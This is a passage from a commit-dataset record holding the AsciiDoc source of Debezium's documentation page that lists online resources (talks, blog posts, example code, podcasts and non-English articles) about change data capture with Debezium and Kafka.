https:\/\/www.slideshare.net\/kgwap\/kafka-connect-debezium?ref=http:\/\/kasundon.com\/2018\/07\/08\/streaming-mysql-change-sets-to-kafka-aws-kinesis\/[\"Kafka Connect - Debezium; Stream MySQL Events to Kafka\"] by Kasun Don; 2018\n* \"Streaming Database Changes with Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=IOZ2Um6e430[Video recording] from Devoxx 2017; https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[Slides] from RivieraDev 2018)\n* https:\/\/speakerdeck.com\/xenji\/kafka-and-debezium-at-trivago-code-dot-talks-2017-edition\"[\"Kafka and Debezium at trivago\"] by https:\/\/twitter.com\/xenji\/[Mario M\u00fcller] and https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Code.Talks 2017\n* https:\/\/vimeo.com\/168409093[\"Event Sourcing with Debezium and Kafka\"] by Christian Posta; 2016\n\n== Blog Posts & Articles\n\n* https:\/\/medium.com\/incognia-tech\/ensuring-data-consistency-across-services-with-the-transactional-outbox-pattern-90be4d735cb0[\"Ensuring data consistency across services with the Transactional Outbox pattern\"] by Mateus Moury and Rafael Acevedo\n* https:\/\/medium.com\/swlh\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/event-driven-utopia\/a-gentle-introduction-to-event-driven-change-data-capture-683297625f9b[\"A Gentle Introduction to Event-driven Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/maciejszymczyk.medium.com\/change-data-capture-convert-your-database-into-a-stream-with-debezium-356c1a49b459[\"Change Data Capture \u2014 Convert your database into a stream with Debezium\"] by Maciej Szymczyk\n* https:\/\/info.crunchydata.com\/blog\/postgres-change-data-capture-with-debezium[\"Change Data Capture in Postgres With Debezium\"] by Dave Cramer\n* https:\/\/medium.com\/apache-pinot-developer-blog\/change-data-analysis-with-debezium-and-apache-pinot-b4093dc178a7[\"Change Data Analysis with Debezium and Apache Pinot\"] by Kenny Bastani\n* https:\/\/juliuskrah.com\/blog\/2020\/01\/06\/streaming-changes-from-keycloak-using-debezium-cdc\/[\"Streaming Changes from Keycloak using Debezium (CDC)\"] by Julius Krah\n* https:\/\/www.tigeranalytics.com\/blog\/building-nrt-data-pipeline-debezium-kafka-snowflake\/[\"Building a Near-Real Time (NRT) Data Pipeline using Debezium, Kafka, and Snowflake\"] by Arun Kumar Ponnurangam and Karunakar Goud\n* https:\/\/medium.com\/data-rocks\/creating-a-no-code-aws-native-oltp-to-olap-data-pipeline-part-1-50481b57dc30[\"Creating a no-code AWS native OLTP to OLAP data pipeline \u2014 Part 1\"] by Haris Michailidis\n* https:\/\/www.zuehlke.com\/en\/insights\/design-failure-distributed-transactions-microservices[\"Design for Failure \u2014 Distributed Transactions in Microservices\"] by Darren Boo\n* https:\/\/blog.rafaelgss.com.br\/autonomous-microservices[\"Autonomous Microservices - Outbox Pattern\"] by Rafael Gonzaga\n* https:\/\/medium.com\/trendyol-tech\/debezium-with-simple-message-transformation-smt-4f5a80c85358[\"Debezium with Simple Message Transformation (SMT)\"] by Okan Yildirim\n* https:\/\/www.systemcraftsman.com\/2020\/11\/30\/asap-the-storified-demo-of-introduction-to-debezium-and-kafka-on-kubernetes\/[\"ASAP! \u2013 The Storified Demo of Introduction to Debezium and Kafka on Kubernetes\"] by Aykut Bulgu\n* https:\/\/elephanttamer.net\/?p=50[\"Setting up PostgreSQL for Debezium\"] by Micha\u0142 Mackiewicz\n* https:\/\/medium.com\/@midhunsukumaran.mec\/a-year-and-a-half-with-debezium-f4f323b4909d[\"A year and a half with Debezium: CDC With MySQL\"] by Midhun Sukumaran\n* https:\/\/jet-start.sh\/blog\/2020\/10\/06\/enabling-full-text-search[\"Enabling Full-text Search with Change Data Capture in a Legacy Application\"] by Franti\u0161ek Hartman\n* https:\/\/medium.com\/@sumant.rana\/sync-mysql-to-postgresql-using-debezium-and-kafkaconnect-d6612489fd64[\"Sync MySQL to PostgreSQL using Debezium and Kafka Connect\"] by Sumant Rana\n* https:\/\/turkogluc.com\/postgresql-capture-data-change-with-debezium\/[\"Making Sense of Change Data Capture Pipelines for Postgres with Debezium Kafka Connector\"] by Cemal Turkoglu\n* https:\/\/developers.redhat.com\/cheat-sheets\/debezium-openshift-cheat-sheet[\"Debezium on OpenShift Cheat Sheet\"] by Abdellatif Bouchama\n* https:\/\/medium.com\/data-rocks\/managing-kafka-connectors-at-scale-using-kafka-connect-manager-kcm-31d887de033c[\"Managing Kafka Connectors at scale using Kafka Connect Manager\"] by Sandeep Mehta\n* https:\/\/medium.com\/dana-engineering\/streaming-data-changes-in-mysql-into-elasticsearch-using-debezium-kafka-and-confluent-jdbc-sink-8890ad221ccf[\"How to stream data changes from MySQL into Elasticsearch using Debezium\"] by Rizqi Nugroho\n* https:\/\/medium.com\/@changeant\/implementing-the-transactional-outbox-pattern-with-debezium-in-quarkus-f2680306951[\"Implementing the Transactional Outbox pattern with Debezium in Quarkus\"] by Iain Porter\n* https:\/\/www.confluent.io\/blog\/cdc-and-streaming-analytics-using-debezium-kafka\/[\"Analysing Changes with Debezium and Kafka Streams\"] by Mike Fowler\n* https:\/\/medium.com\/@bogdan.dina03\/de-coupling-yourself-507a15fa100d[\"(De)coupling yourself\"] by Dina Bogdan\n* https:\/\/medium.com\/comsystoreply\/stream-your-database-into-kafka-with-debezium-a94b2f649664[\"Stream Your Database into Kafka with Debezium -- An Introduction and Experience Report\"] by David Hettler\n* https:\/\/medium.com\/@limadelrey\/kafka-connect-how-to-create-a-real-time-data-pipeline-using-change-data-capture-cdc-c60e06e5306a[\"Kafka Connect: How to create a real time data pipeline using Change Data Capture (CDC)\"] by Francisco Lima\n* https:\/\/dev.to\/abhirockzz\/tutorial-set-up-a-change-data-capture-architecture-on-azure-using-debezium-postgres-and-kafka-49h6[\"Tutorial: Set up a Change Data Capture architecture on Azure using Debezium, Postgres and Kafka \"] by Abhishek Gupta\n* Kafka Connect \u2013 Offset commit errors by Javier Holguera: https:\/\/www.javierholguera.com\/2020\/06\/02\/kafka-connect-offset-commit-errors-i\/[Part 1], https:\/\/www.javierholguera.com\/2020\/06\/16\/kafka-connect-offset-commit-errors-ii\/[Part 2]\n* https:\/\/medium.com\/@samuel_vdc\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/hepsiburadatech\/postgresql-db-change-data-capture-cdc-using-debezium-f1a933174fd8[\"PostgreSql Db Change Data Capture (CDC) Using Debezium\"] by Caner Tosuner\n* http:\/\/www.mastertheboss.com\/jboss-frameworks\/debezium\/getting-started-with-debezium[\"Getting started with Debezium\"] by Francesco Marchioni\n* https:\/\/dev.to\/oryanmoshe\/debezium-custom-converters-timestampconverter-26hh[\"Debezium Custom Converters - TimestampConverter\"] by Oryan Moshe\n* https:\/\/www.gridgain.com\/resources\/blog\/change-data-capture-between-mysql-and-gridgain-debezium[\"Change Data Capture Between MySQL and GridGain With Debezium\"] by Evgenii Zhuravlev\n* https:\/\/cloud.google.com\/blog\/products\/data-analytics\/how-to-move-data-from-mysql-to-bigquery[\"How do I move data from MySQL to BigQuery?\"], discussing usage of the Debezium embedded engine with Google Cloud Dataflow, by Pablo Estrada and Griselda Cuevas\n* https:\/\/medium.com\/everything-full-stack\/streaming-data-changes-to-a-data-lake-with-debezium-and-delta-lake-pipeline-299821053dc3[\"Streaming data changes to a Data Lake with Debezium and Delta Lake pipeline\"] by Yinon D. Nahamu\n* https:\/\/www.infoq.com\/news\/2020\/01\/cdc-debezium-1-0-final-released\/[\"Change Data Capture Tool Debezium 1.0 Final Released\"] by Jan Stenberg\n* https:\/\/strimzi.io\/2020\/01\/27\/deploying-debezium-with-kafkaconnector-resource.html[\"Deploying Debezium using the new KafkaConnector resource\"] by Tom Bentley\n* https:\/\/www.sderosiaux.com\/articles\/2020\/01\/06\/learnings-from-using-kafka-connect-debezium-postgresql\/[\"Learnings from using Kafka Connect - Debezium - PostgreSQL\"] by St\u00e9phane Derosiaux\n* https:\/\/thedataguy.in\/monitor-debezium-mysql-connector-with-prometheus-and-grafana\/[\"Monitor Debezium MySQL Connector With Prometheus And Grafana\"] by Bhuvanesh\n* http:\/\/www.carbonrider.com\/2019\/11\/16\/change-data-capture-with-apache-kafka-postgresql-kafka-connect-and-debezium\/[\"Change Data Capture with Apache Kafka, PostgreSQL, Kafka Connect and Debezium\"] by Yogesh Jadhav\n* https:\/\/dzone.com\/articles\/implementing-the-outbox-pattern[\"Implementing the Outbox Pattern\"] by Sohan Ganapathy\n* https:\/\/medium.com\/engineering-varo\/event-driven-architecture-and-the-outbox-pattern-569e6fba7216[\"Event-Driven Architecture and the Outbox Pattern\"] by Rod Shokrian\n* https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[\"Logs & Offsets: (Near) Real Time ELT with Apache Kafka + Snowflake\"] by Adrian Kreuziger\n* https:\/\/info.crunchydata.com\/blog\/postgresql-change-data-capture-with-debezium[\"PostgreSQL Change Data Capture With Debezium\"] by Dave Cramer\n* https:\/\/developers.redhat.com\/blog\/2019\/09\/03\/cdc-pipeline-with-red-hat-amq-streams-and-red-hat-fuse\/[\"CDC pipeline with Red Hat AMQ Streams and Red Hat Fuse\"] by Sadhana Nandakumar\n* https:\/\/medium.com\/@hpgrahsl\/communicating-data-changes-across-service-boundaries-safely-129c4eb5db8[\"Communicating Data Changes Across Service Boundaries\u2026 Safely!\"] by Hans-Peter Grahsl\n* https:\/\/blog.clairvoyantsoft.com\/mysql-cdc-with-apache-kafka-and-debezium-3d45c00762e4[\"MySQL CDC with Apache Kafka and Debezium\"] by Kushal Yellam\n* https:\/\/thoughts-on-java.org\/outbox-pattern-with-cdc-and-debezium\/[\"Implementing the Outbox Pattern with CDC using Debezium\"] by Thorben Janssen\n* https:\/\/blog.zhaw.ch\/splab\/2019\/05\/03\/serverless-plumbing-streaming-mysql-events-to-knative-services\/[\"Serverless Plumbing: Streaming MySQL Events to Knative Services\"] by Mohammed Al-Ameen\n* https:\/\/medium.com\/yotpoengineering\/building-zero-latency-data-lake-using-change-data-capture-f93ef50eb066[\"Building zero-latency data lake using Change Data Capture\"] by Ofir Ventura\n* https:\/\/medium.com\/high-alpha\/data-stream-processing-for-newbies-with-kafka-ksql-and-postgres-c30309cfaaf8[\"Data Stream Processing for Newbies with Kafka, KSQL, and Postgres\"] by Maria Patterson\n* https:\/\/blog.couchbase.com\/kafka-connect-mysql-couchbase-debezium\/[\"Kafka Connect from MySQL to Couchbase with Debezium\"] by Matthew Groves\n* https:\/\/www.linkedin.com\/pulse\/change-data-capture-postgresql-via-debezium-part-1-paolo-scarpino\/[\"Change Data Capture on PostgreSQL via Debezium\"] by Paolo Scarpino\n* https:\/\/medium.com\/jw-player-engineering\/southpaw-176aea5f4583[\"Southpaw - Streaming Left Joins with Change Data Capture\"] by Morrigan Jones\n* https:\/\/medium.com\/@hpgrahsl\/connecting-apache-kafka-to-azure-cosmosdb-part-ii-b96cf0f5cdfa[\"Connecting Apache Kafka to Azure CosmosDB\u200a\u2014\u200aPart II\"] by Hans-Peter Grahsl\n* https:\/\/vladmihalcea.com\/how-to-extract-change-data-events-from-mysql-to-kafka-using-debezium\/[\"How to extract change data events from MySQL to Kafka using Debezium\"] by Vlad Mihalcea\n* https:\/\/rmoff.net\/2019\/10\/16\/using-kafka-connect-and-debezium-with-confluent-cloud\/[\"Using Kafka Connect and Debezium with Confluent Cloud\"]\n* https:\/\/rmoff.net\/2019\/11\/20\/streaming-data-from-sql-server-to-kafka-to-snowflake-with-kafka-connect\/[\"Streaming data from SQL Server to Kafka to Snowflake \u2744\ufe0f with Kafka Connect and Debezium\"]\n* https:\/\/rmoff.net\/2018\/03\/24\/streaming-data-from-mysql-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MySQL into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/rmoff.net\/2018\/03\/27\/streaming-data-from-mongodb-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MongoDB into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/medium.com\/@tilakpatidar\/streaming-data-from-postgresql-to-kafka-using-debezium-a14a2644906d[\"Streaming data from PostgreSQL to Kafka using Debezium\"] by Tilak Patidar\n* https:\/\/medium.com\/blablacar-tech\/streaming-data-out-of-the-monolith-building-a-highly-reliable-cdc-stack-d71599131acb[\"Streaming Data out of the Monolith: Building a Highly Reliable CDC Stack\"] by Yuancheng Peng\n* https:\/\/iamninad.com\/how-debezium-kafka-stream-can-help-you-write-cdc\/[\"How Debezium & Kafka Streams Can Help You Write CDC Solution\"] by Neenad Ingole\n* https:\/\/jakubbujny.com\/2018\/09\/20\/replicate-cloud-aws-rds-mysql-to-on-premise-postgresql-in-docker-future-is-today-debezium-and-kafka-on-aws-eks\/[Replicate cloud AWS RDS MySQL to on-premise PostgreSQL in Docker \u2013 future is today! Debezium and Kafka on AWS EKS] by Jakub Bujny\n* https:\/\/medium.com\/@mauridb\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream - Responding to data changes in real time using modern technologies\"]\n* https:\/\/medium.com\/@hpgrahsl\/optimizing-read-access-to-sharded-mongodb-collections-utilizing-apache-kafka-connect-cdcd8ec6228[\"Optimizing Read Access to Sharded MongoDB Collections utilizing Apache Kafka Connect\"] by Hans-Peter Grahsl\n\n== Example Code\n\n* https:\/\/github.com\/debezium\/debezium-examples\/[Debezium's official examples]\n* https:\/\/ibm-cloud-architecture.github.io\/refarch-eda\/use-cases\/db2-debezium\/[DB2 Change Data Capture with Debezium]\n* https:\/\/github.com\/yorek\/debezium-sql-change-stream[\"SQL Server Change Stream sample using Debezium\"] by Davide Mauri\n* https:\/\/github.com\/foogaro\/change-data-capture[\"CDC project based on Debezium, Kafka, MS SQL Server, Infinispan and Teiid, entirely based on containers\"] by Luigi Fugaro\n* https:\/\/github.com\/fvaleri\/cdc[\"CDC with Camel and Debezium: code-driven vs configuration-driven pipelines\"] by Federico Valeri\n* https:\/\/github.com\/morsapaes\/flink-sql-CDC[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/github.com\/suadev\/microservices-change-data-capture-with-debezium[\"Microservices Change Data Capture With Debezium\"] by Suat K\u00f6se\n\n== Interviews and Podcasts\n\n* https:\/\/www.dataengineeringpodcast.com\/debezium-change-data-capture-episode-114\/[Change Data Capture For All Of Your Databases With Debezium -- episode #114 of the Data Engineering Podcast by Tobias Macey, together with Randall Hauch]\n* https:\/\/www.buzzsprout.com\/186154\/1770184[MySQL, Cassandra, BigQuery, and Streaming Analytics with Joy Gao]\n* http:\/\/airhacks.fm\/#episode_57[CDC, Debezium, streaming and Apache Kafka -- episode #57 of Adam Bien's airhacks.fm podcast]\n* https:\/\/www.buzzsprout.com\/186154\/1365043-change-data-capture-with-debezium-ft-gunnar-morling[Change Data Capture with Debezium ft. Gunnar Morling]\n* https:\/\/www.youtube.com\/watch?v=H-yGdKy48VE[Interview with Gunnar Morling] for thoughts-on-java.org\n\n== Other\n\n* https:\/\/www.thoughtworks.com\/radar\/platforms\/debezium[Debezium entry in the ThoughtWorks Technology Radar]\n* https:\/\/learn.openshift.com\/middleware\/debezium-getting-started\/[Getting Started with Debezium on OpenShift]; interactive Debezium learning scenario allowing you to try out Debezium on OpenShift within minutes\n\n== Non-English Resources\n\n* \ud83c\udde9\ud83c\uddea https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-1\/[Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 1) \u2013 Die Theorie] by (blog post, German)\n* \ud83c\uddf5\ud83c\uddf1 https:\/\/wiadrodanych.pl\/big-data\/change-data-capture-mysql-debezium\/[Change Data Capture \u2013 Zmie\u0144 Baz\u0119 W Strumie\u0144 (Debezium)] by Maciej Szymczyk (blog post, Polish)\n* \ud83c\uddf7\ud83c\uddfa https:\/\/habr.com\/ru\/company\/flant\/blog\/523510\/[\u0417\u043d\u0430\u043a\u043e\u043c\u0441\u0442\u0432\u043e \u0441 Debezium \u2014 CDC \u0434\u043b\u044f Apache Kafka] (blog post, Russian)\n* \ud83c\udde8\ud83c\uddf3 https:\/\/mp.weixin.qq.com\/s\/Mfn-fFegb5wzI8BIHhNGvQ[\"Flink SQL CDC \u4e0a\u7ebf\uff01\u6211\u4eec\u603b\u7ed3\u4e86 13 \u6761\u751f\u4ea7\u5b9e\u8df5\u7ecf\u9a8c\"] by Zeng Qingdong (blog post, Mandarin)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@viavarejo.productdevelopment\/uma-estrat%C3%A9gia-de-cdc-com-debezium-e27aa945d7b0[\"Uma estrat\u00e9gia de CDC com Debezium\"] by Jo\u00e3o Gabriel Mello, Brunno Lira and Marcelo Costa (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.infoq.com\/br\/presentations\/postgresql-ao-datalake-utilizando-kafkadebezium\/[Do PostgreSQL ao Data Lake utilizando Kafka-Debezium] by Paulo Singaretti, PGConf S\u00e3o Paulo 2019 (conference session recording, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.youtube.com\/watch?v=jtVD-HIJG9M&feature=youtu.be[Quarkus #25: Monitoramento de qualquer opera\u00e7\u00e3o em uma tabela do banco de dados com Debezium] by Vinicius Ferraz (sceen cast, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/elo7.dev\/cdc-parte-1\/[\"Introdu\u00e7\u00e3o ao Change Data Capture (CDC)\"] by Renato Sardinha (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@singaretti\/streaming-de-dados-do-postgresql-utilizando-kafka-debezium-v2-d49f46d70b37[\"Streaming de dados (do PostgreSQL) utilizando Kafka|Debezium (v2)\"] by Paulo Singaretti (blog post, Portuguese)\n* \ud83c\uddeb\ud83c\uddf7 https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019\/[Conf\u00e9rence POSS 2019 : Streaming Processing avec Debezium] by Yabir Canario De la Mota & Charly Clairmont (blog post, French)\n* \ud83c\udde9\ud83c\uddea https:\/\/www.heise.de\/developer\/artikel\/Im-Gespraech-Gunnar-Morling-ueber-Debezium-und-CDC-4513865.html[Im Gespr\u00e4ch: Gunnar Morling \u00fcber Debezium und CDC]; interview with Thorben Janssen for heise.de (podcast, German)\n* \ud83c\uddee\ud83c\udde9 https:\/\/medium.com\/easyread\/ingest-data-dari-mysql-database-ke-bigquery-dengan-apache-kafka-dan-debezium-f519e197f39c[\"Ingesting Data dari MySQL Database ke BigQuery dengan Apache Kafka dan Debezium\"] by Ilyas Ahsan (blog post, Indonesian)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/19\/debezium-camel-integration\/[Debezium\u3068Apache Camel\u306e\u30a4\u30f3\u30c6\u30b0\u30ec\u30fc\u30b7\u30e7\u30f3\u30b7\u30ca\u30ea\u30aa] (Japanese translation of the blog post link:\/blog\/2020\/02\/19\/debezium-camel-integration\/[Integration Scenarios with Debezium and Apache Camel] by Jiri Pechanec)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/10\/event-sourcing-vs-cdc\/[\u30de\u30a4\u30af\u30ed\u30b5\u30fc\u30d3\u30b9\u306e\u305f\u3081\u306e\u5206\u6563\u30c7\u30fc\u30bf \u301c \u30a4\u30d9\u30f3\u30c8\u30bd\u30fc\u30b7\u30f3\u30b0 vs \u30c1\u30a7\u30f3\u30b8\u30c7\u30fc\u30bf\u30ad\u30e3\u30d7\u30c1\u30e3] (Japanese translation of the blog post link:\/blog\/2020\/02\/10\/event-sourcing-vs-cdc\/[Distributed Data for Microservices \u2014 Event Sourcing vs. Change Data Capture] by Eric Murphy)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e462f753d264f97fb0d1a64b52f7fcec0b675875","subject":"Update online-resources.asciidoc","message":"Update online-resources.asciidoc","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"documentation\/online-resources.asciidoc","new_file":"documentation\/online-resources.asciidoc","new_contents":"---\nlayout: page-menu\ntitle: Resources on the Web\npermalink: \/documentation\/online-resources\/\n---\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nA compilation of blog posts, slide sets, recordings and other online resources around Debezium.\nMost of the resources are in English; you can find a collection of link:#non_english_resources[resources in other languages] like Portuguese or French towards the end of this page.\n\nYou've written or spoken about Debezium and would like to have your post or talk listed here?\nThat's great, let us know by sharing the link in our https:\/\/groups.google.com\/forum\/#!forum\/debezium[forum].\nOr better yet, just add the link to the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/docs\/online-resources.asciidoc[source of this page] yourself and send a pull request against the https:\/\/github.com\/debezium\/debezium.github.io[debezium.github.io] repo.\nThanks!\n\n== Presentations, Session Recordings and Videos\n\n* https:\/\/www.youtube.com\/watch?v=_jy0VmpdSu4[\"DevOps Malaysia Online Meetup #32 : Using Debezium for Microservices Outbox Pattern\"] by CK Gan\n* https:\/\/www.youtube.com\/watch?v=yWFFOkWlLoY[\"Analyzing Real-time Order Deliveries using CDC with Debezium and Pinot\"] by Kenny Bastani and Gunnar Morling\n* https:\/\/www.youtube.com\/watch?v=R1kOuvLYcYo[\"Dissecting our Legacy: The Strangler Fig Pattern with Apache Kafka, Debezium and MongoDB\"] by Hans-Peter Grahsl and Gunnar Morling\n* https:\/\/2021.berlinbuzzwords.de\/session\/change-data-streaming-patterns-distributed-systems[\"Change Data Streaming Patterns in Distributed Systems\"] by Gunnar Morling and Hans-Peter Grahsl\n* link:++https:\/\/static.sched.com\/hosted_files\/ossna2020\/c6\/Managing Data Consistency with Debezium.pdf++[\"Managing Data Consistency Among Microservices with Debezium\"] by Justin Chao\n* https:\/\/noti.st\/morsapaes\/liQzgs\/change-data-capture-with-flink-sql-and-debezium[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/www.youtube.com\/watch?v=DJTtGaPsSYY[\"Quarkus Insights #10: CDC, Debezium and the outbox pattern\"]; a live-streamed session with the Quarkus team on Debezium and the outbox pattern, including a demo\n* https:\/\/www.slideshare.net\/nfrankel\/london-inmemory-computing-meetup-a-changedatacapture-usecase-designing-an-evergreen-cache[\"A Change-Data-Capture use-case: designing an evergreen cache\"] by Nicolas Fr\u00e4nkel\n* https:\/\/www.youtube.com\/watch?v=6nU9i022yeY[\"Microservices & Data: Implementing the Outbox Pattern with Debezium\"] by Thorben Janssen\n* \"Practical Change Data Streaming Use Cases With Apache Kafka and Debezium\" (https:\/\/www.infoq.com\/presentations\/data-streaming-kafka-debezium\/[recording], https:\/\/speakerdeck.com\/gunnarmorling\/practical-change-data-streaming-use-cases-with-apache-kafka-and-debezium-qcon-san-francisco-2019[slides]) by Gunnar Morling; QCon San Francisco 2019; JokerConf St. Petersburg 2019\n* https:\/\/speakerdeck.com\/jbfletch\/using-kafka-to-discover-events-hidden-in-your-database[\"Using Kafka to Discover Events Hidden in your Database\"] by Anna McDonald; Kafka Summit San Francisco 2019\n* https:\/\/databricks.com\/session_eu19\/modern-etl-pipelines-with-change-data-capture[\"Modern ETL Pipelines with Change Data Capture\"] by Thiago Rigo and David Mariassy; Spark and AI Summit Europe 2019\n* https:\/\/www.infoq.com\/news\/2019\/04\/change-data-capture-debezium\/[\"Creating Events from Databases Using Change Data Capture: Gunnar Morling at MicroXchg Berlin\"] by Jan Stenberg; a session report from MicroXchg\n* https:\/\/developers.redhat.com\/videos\/youtube\/QYbXDp4Vu-8\/[\"Change Data Streaming Patterns for Microservices With Debezium\"] by Gunnar Morling; 30 min webinar with live demo, February 2019\n* https:\/\/www.slideshare.net\/MikeFowler28\/migrating-with-debezium[\"Migrating with Debezium\"] by Mike Fowler; London PostgreSQL Meetup, January 2019\n* \"The Why's and How's of Database Streaming\" by Joy Gao (https:\/\/www.infoq.com\/presentations\/wepay-database-streaming[recording], https:\/\/qconsf.com\/system\/files\/presentation-slides\/whys_and_hows_of_database_streaming_final.pdf[slides]), QCon San Francisco, 2018\n* \"Change Data Streaming Patterns for Microservices With Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=NawsloOoFo0[video recording], https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[slides]), Voxxed Microservices Paris 2018; https:\/\/www.confluent.io\/kafka-summit-sf18\/change-data-streaming-patterns-for-microservices-with-debezium[recording and slides] from Kafka Summit San Francisco 2018\n* https:\/\/speakerdeck.com\/rk3rn3r\/i-need-my-data-and-a-little-bit-of-your-data-dot-integrating-services-with-apache-kafka-confluent-streaming-event-munich[\"I need my data and a little bit of your data.\" - Integrating services with Apache Kafka] by https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Confluent Streaming Event Munich 2018\n* https:\/\/aiven.io\/assets\/img\/blog\/zalando-kafka-cdc-presentation.pdf[\"PG Change Data Capture with Debezium\"] by Hannu Valtonen; Kafka Meetup Helsinki 2018\n* https:\/\/de.slideshare.net\/FrankLyaruu\/embracing-database-diversity-with-kafka-and-debezium[\"Embracing Database Diversity with Kafka and Debezium\"] by Frank Lyaruu; VoxxedDays Vienna 2018\n* https:\/\/speakerdeck.com\/japoneizo\/syncing-data-between-microservices-using-debezium-and-apache-kafka[\"Syncing data between microservices using Debezium and Apache Kafka\"] by Eizo Nishime; The Developer's Conference S\u00e3o Paulo 2018\n* https:\/\/www.slideshare.net\/kgwap\/kafka-connect-debezium?ref=http:\/\/kasundon.com\/2018\/07\/08\/streaming-mysql-change-sets-to-kafka-aws-kinesis\/[\"Kafka Connect - Debezium; Stream MySQL Events to Kafka\"] by Kasun Don; 2018\n* \"Streaming Database Changes with Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=IOZ2Um6e430[Video recording] from Devoxx 2017; https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[Slides] from RivieraDev 2018)\n* https:\/\/speakerdeck.com\/xenji\/kafka-and-debezium-at-trivago-code-dot-talks-2017-edition\"[\"Kafka and Debezium at trivago\"] by https:\/\/twitter.com\/xenji\/[Mario M\u00fcller] and https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Code.Talks 2017\n* https:\/\/vimeo.com\/168409093[\"Event Sourcing with Debezium and Kafka\"] by Christian Posta; 2016\n\n== Blog Posts & Articles\n\n* https:\/\/medium.com\/modanisa-engineering\/integrating-grafana-notifications-with-gitlab-pipeline-to-restart-debezium-tasks-using-go-1378c9eaf7b8[\"Integrating Grafana Notifications with GitLab Pipeline to restart Debezium tasks using Go\"] by Abdulsamet \u0130LER\u0130\n* https:\/\/www.reddit.com\/r\/RedditEng\/comments\/qkfx7a\/change_data_capture_with_debezium\/[\"Change Data Capture with Debezium\"] by Adriel Velazquez and Alan Tai\n* https:\/\/medium.com\/cermati-tech\/practical-notes-in-change-data-capture-with-debezium-and-postgres-fe31bb11ab78[\"Practical Notes in Change Data Capture with Debezium and Postgres\"] by Sharath Gururaj\n* https:\/\/medium.com\/google-cloud\/change-data-capture-with-debezium-server-on-gke-from-cloudsql-for-postgresql-to-pub-sub-d1c0b92baa98[\"Change Data Capture with Debezium Server on GKE from CloudSQL for PostgreSQL to Pub\/Sub\"] by Berker Narol\n* https:\/\/vkontech.com\/mongodb-change-data-capture-via-debezium-kafka-connector-with-a-net-5-client\/[\"MongoDB Change Data Capture via Debezium Kafka Connector with a .NET 5 Client\"] by Vasil Kosturski\n* https:\/\/engineering.outschool.com\/posts\/journey-to-better-search\/[\"The Journey to Better Search\"] by Jess Monroe, Nuria Ruiz and Parima Shah\n* https:\/\/snourian.com\/reliable-messaging-outbox-pattern-kafka-debezium-oracle-micronaut-kubernetes\/[\"Reliable Messaging in Microservices \u2013 Implementing Outbox Pattern using Kafka, Debezium, Micronaut, and Oracle Database on Kubernetes\"] by Sina Nourian\n* https:\/\/vkontech.com\/mongodb-change-data-capture-via-debezium-kafka-connector-with-a-net-5-client\/[\"MongoDB Change Data Capture via Debezium Kafka Connector with a .NET 5 Client\"] by Vasil Kosturski\n* https:\/\/www.wix.engineering\/post\/the-reactive-monolith-how-to-move-from-crud-to-event-sourcing[\"The Reactive Monolith - How to Move from CRUD to Event Sourcing\"] by Jonathan David\n* https:\/\/techcommunity.microsoft.com\/t5\/azure-database-for-mysql\/cdc-in-azure-database-for-mysql-flexible-server-using-kafka\/ba-p\/2780943[\"\nCDC in Azure Database for MySQL \u2013 Flexible Server using Kafka, Debezium, and Azure Event Hubs\"] by Sudheesh Narayanaswamy\n* https:\/\/vectorized.io\/blog\/redpanda-debezium\/[\"Using Debezium and Redpanda for CDC\"] by Almas Maksotov\n* https:\/\/medium.com\/event-driven-utopia\/understanding-materialized-views-3-stream-table-joins-with-cdc-77591d2d6fa0[\"Understanding Materialized Views \u2014 Stream-Table Joins with CDC\"] by Dunith Dhanushka\n* https:\/\/materialize.com\/change-data-capture-is-having-a-moment-why[\"Change Data Capture is having a moment. Why?\"] by Andy Hattemer\n* https:\/\/braindose.blog\/2021\/09\/13\/true-atomic-microservices-debezium\/[\"A True Atomic Microservices Implementation with Debezium to Ensure Data Consistency\"] by CK Gan\n* https:\/\/itnext.io\/hydrating-a-data-lake-using-log-based-change-data-capture-cdc-with-debezium-apicurio-and-kafka-799671e0012f[\"Hydrating a Data Lake using Log-based Change Data Capture 